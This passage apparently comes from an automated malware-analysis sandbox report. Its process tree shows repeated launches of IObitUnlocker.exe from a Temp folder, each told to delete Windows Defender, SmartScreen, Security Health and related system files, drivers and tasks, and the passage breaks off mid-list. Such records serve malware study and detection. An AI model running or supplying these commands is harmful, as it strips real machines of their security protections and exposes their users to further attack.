                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 